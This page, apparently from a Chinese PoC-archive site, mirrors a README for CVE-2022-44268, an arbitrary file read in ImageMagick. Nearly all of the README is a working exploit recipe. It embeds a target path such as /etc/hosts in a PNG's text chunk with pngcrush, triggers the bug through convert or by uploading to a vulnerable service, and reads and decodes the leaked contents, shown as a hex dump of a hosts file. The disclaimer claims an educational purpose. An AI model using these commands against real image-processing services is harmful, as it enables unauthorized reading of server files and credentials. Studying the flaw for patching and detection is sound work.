关联漏洞
标题:
ImageMagick 安全漏洞
(CVE-2022-44268)
描述:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞,该漏洞源于存在信息泄露漏洞,当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。
描述
CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator
介绍
# CVE-2022-44268 ImageMagick Arbitrary File Read PoC
### PoC for CVE-2022-44268 ImageMagick Arbitrary File Read PoC - Payload generator
### This project is created only for educational purposes and cannot be used for law violation or personal gain.
### The author of this project is not responsible for any possible harm caused by the materials of this project.
### Original finding: https://www.metabaseq.com/imagemagick-zero-days/
### Usage:
#### Installing dependencies:
`1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y`
#### Change the filename you want to read below:
`2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png`
#### Confirm everything worked perfectly
`3. $ exiv2 -pS pngout.png`
#### Trigger the PoC via convert or upload image to the vulnerable service:
`4. $ convert pngout.png gopro.png`
#### View content of file was read:
`5. $ identify -verbose gopro.png`
#### Decrypt the content:
`6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'`
## Demo
<img src="https://pbs.twimg.com/media/Fn-RDHzaIAAYy4m?format=png&name=large">
<img src="https://pbs.twimg.com/media/Fn-RDH7aYAcKkS0?format=png&name=large">
<img src="https://pbs.twimg.com/media/Fn-RDHzaMAIsohf?format=png&name=large">
## Tested with Ubuntu 22.04 and default imagemagick installed.
文件快照
[4.0K] /data/pocs/77a97c1039f11738b4cbd91ee96a5a2bccdf2464
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。